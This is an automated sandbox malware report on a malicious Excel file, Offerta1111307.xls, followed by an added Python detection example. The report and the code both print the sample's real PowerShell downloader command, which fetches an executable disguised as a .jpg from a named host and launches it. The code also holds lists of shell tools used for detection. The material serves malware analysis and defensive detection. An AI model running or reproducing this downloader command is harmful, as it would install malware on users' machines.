Analysis
Max time kernel:   137s
Max time network:  140s
Platform:          windows10_x64
Resource:          win10
Submitted:         07-07-2020 12:42

Tasks
Static task       static1
Behavioral task   behavioral1   Sample: Offerta1111307.xls   Resource: win7
Behavioral task   behavioral2   Sample: Offerta1111307.xls   Resource: win10
General
Target:  Offerta1111307.xls
Size:    171KB
MD5:     56efde4b17b8076c0f1f8c2491b3b00d
SHA1:    4212e1fe7bc45ad8f91986445b380d0cfb68ef42
SHA256:  79e42e4da20588bed383670a9af00056e8cc99fcc2353d7a2f5a24ddc2eed66a
SHA512:  355f83c150b288b54e4e0f347cafcd6d7fc7c1740c62fd357e8e72d2abab08abb85c93690cc2209f37f56cee77f45d14eb9d91779a65a16fdd77fe5f32bdcf05
Malware Config
Extracted URL: http://crogtrt.com/IG/6591111307.jpg
(Fetched by powershell.exe, written to %TEMP%\chrone.exe and launched via Shell.Application.ShellExecute, as recorded in the process tree below. The ".jpg" extension is cosmetic: the download is executed as a PE.)
Signatures

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid   process
  716   EXCEL.EXE   (x2)

Suspicious use of WriteProcessMemory (7 IoCs)
  pid   process         target pid   target process
  716   EXCEL.EXE       3352         cmd.exe          (x2)
  3352  cmd.exe         2212         powershell.exe   (x2)
  2212  powershell.exe  3672         chrone.exe       (x3)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  pid   process         token
  2212  powershell.exe  SeDebugPrivilege
  4268  WerFault.exe    SeRestorePrivilege
  4268  WerFault.exe    SeBackupPrivilege
  4268  WerFault.exe    SeDebugPrivilege

Suspicious behavior: EnumeratesProcesses (19 IoCs)
  pid   process
  2212  powershell.exe  (x3)
  4268  WerFault.exe    (x16)

Executes dropped EXE (1 IoC)
  pid   process
  3672  chrone.exe

Program crash (1 IoC)
  pid   process       target pid   target process
  4268  WerFault.exe  3672         chrone.exe
Suspicious use of SetWindowsHookEx (14 IoCs)
  pid   process
  716   EXCEL.EXE   (x14)

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  pid   process   parent pid   parent process   description
  3352  cmd.exe   716          EXCEL.EXE        Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process

Blacklisted process makes network request (1 IoC)
  flow  pid   process
  10    2212  powershell.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
  process    ioc
  EXCEL.EXE  Key opened:         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  EXCEL.EXE  Key value queried:  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  EXCEL.EXE  Key value queried:  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Enumerates system info in registry (2 TTPs, 3 IoCs)
  process    ioc
  EXCEL.EXE  Key opened:         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  EXCEL.EXE  Key value queried:  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  EXCEL.EXE  Key value queried:  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   process
  716   EXCEL.EXE
Processes

EXCEL.EXE (PID 716)
  Image:    C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command:  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Offerta1111307.xls"
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener

  cmd.exe (PID 3352, parent 716)
    Image:    C:\Windows\System32\cmd.exe
    Command:  "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/6591111307.jpg',$env:Temp+'\chrone.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\chrone.exe')
    - Suspicious use of WriteProcessMemory
    - Process spawned unexpected child process

    powershell.exe (PID 2212, parent 3352)
      Image:    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command:  powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/6591111307.jpg',$env:Temp+'\chrone.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\chrone.exe')
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request

      chrone.exe (PID 3672, parent 2212)
        Image:    C:\Users\Admin\AppData\Local\Temp\chrone.exe
        Command:  "C:\Users\Admin\AppData\Local\Temp\chrone.exe"
        - Executes dropped EXE

        WerFault.exe (PID 4268, parent 3672)
          Image:    C:\Windows\SysWOW64\WerFault.exe
          Command:  C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 892
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious behavior: EnumeratesProcesses
          - Program crash
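The chain EXCEL.EXE -> cmd.exe -> powershell.exe -> chrone.exe in the tree above is what the report's "Process spawned unexpected child process" and "Blacklisted process makes network request" signatures are keyed on. The Python below is an added example, not part of the sandbox report and not the sandbox's own detection code: it re-creates the Office-to-shell ancestry check over process-creation events constructed from this report's process tree (same PIDs, images and command lines) and pulls the download URL, dropped file name and evasion flags out of the PowerShell command line. The ProcEvent record layout, the Office and shell image lists, and the extracted field names are assumptions; EXCEL.EXE's own parent is not recorded in the report, so it is left unknown.

```python
"""Added example: Office -> shell chain detection and downloader IOC extraction
over process-creation events constructed from this sandbox report."""
import os
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record. The field set is an assumption, loosely
    modelled on Sysmon Event ID 1; any EDR process telemetry carries the same data."""
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Exactly the PowerShell command line recorded in the report's process tree.
PS_DOWNLOADER = (
    r"powershell.exe -executionpolicy bypass -W Hidden -command "
    r"(new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/6591111307.jpg',"
    r"$env:Temp+'\chrone.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\chrone.exe')"
)

# Constructed from the report's process tree; EXCEL.EXE's parent is not recorded there.
EVENTS = [
    ProcEvent(716, None, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" '
              r'"C:\Users\Admin\AppData\Local\Temp\Offerta1111307.xls"'),
    ProcEvent(3352, 716, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ' + PS_DOWNLOADER),
    ProcEvent(2212, 3352, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              PS_DOWNLOADER),
    ProcEvent(3672, 2212, r"C:\Users\Admin\AppData\Local\Temp\chrone.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\chrone.exe"'),
    ProcEvent(4268, 3672, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 892"),
]

# Image lists are assumptions for the example; tune them to the estate you monitor.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: dict) -> list:
    """Walk parent links to the root or to an unrecorded parent; the seen-set
    guards against PID reuse turning the walk into a loop."""
    chain, seen = [], {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def find_office_shell_chains(events) -> list:
    """Return (child_pid, office_pid) for every shell or script host with an Office
    process anywhere in its ancestry. Checking the whole ancestry rather than the
    direct parent is what catches powershell.exe here: its parent is cmd.exe."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) not in SHELL_IMAGES:
            continue
        for anc in ancestors(ev, by_pid):
            if basename(anc.image) in OFFICE_IMAGES:
                hits.append((ev.pid, anc.pid))
                break
    return hits


DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*([^)]+)\)", re.I)


def extract_downloader_iocs(cmdline: str) -> Optional[dict]:
    """Pull URL, dropped file name and evasion flags out of a WebClient downloader
    command line; None when the line carries no DownloadFile call."""
    m = DOWNLOAD_RE.search(cmdline)
    if not m:
        return None
    url, dest_expr = m.group(1), m.group(2)
    # dest_expr is an expression such as $env:Temp+'\chrone.exe'; keep only the leaf name.
    dropped = re.sub(r"['\"]", "", dest_expr).rsplit("\\", 1)[-1]
    url_ext = os.path.splitext(urlparse(url).path)[1].lower()
    drop_ext = os.path.splitext(dropped)[1].lower()
    return {
        "url": url,
        "dropped_name": dropped,
        "execution_policy_bypass": bool(re.search(r"-e\w*\s+bypass", cmdline, re.I)),
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I)),
        "launches_download": "ShellExecute" in cmdline or "Start-Process" in cmdline,
        # Served as .jpg, written as .exe: the report's tell-tale of a disguised payload.
        "extension_mismatch": url_ext != drop_ext,
    }


if __name__ == "__main__":
    for child, office in find_office_shell_chains(EVENTS):
        print(f"shell pid {child} descends from Office pid {office}")
    print(extract_downloader_iocs(EVENTS[2].cmdline))
```

Two points the report alone does not make explicit: the direct-parent rule that fires on cmd.exe (PID 3352) would miss powershell.exe (PID 2212), whose parent is cmd.exe, so the check walks the full ancestry; and the URL's ".jpg" versus the ".exe" written to %TEMP% is extracted as an explicit mismatch flag rather than left for an analyst to notice in the command line.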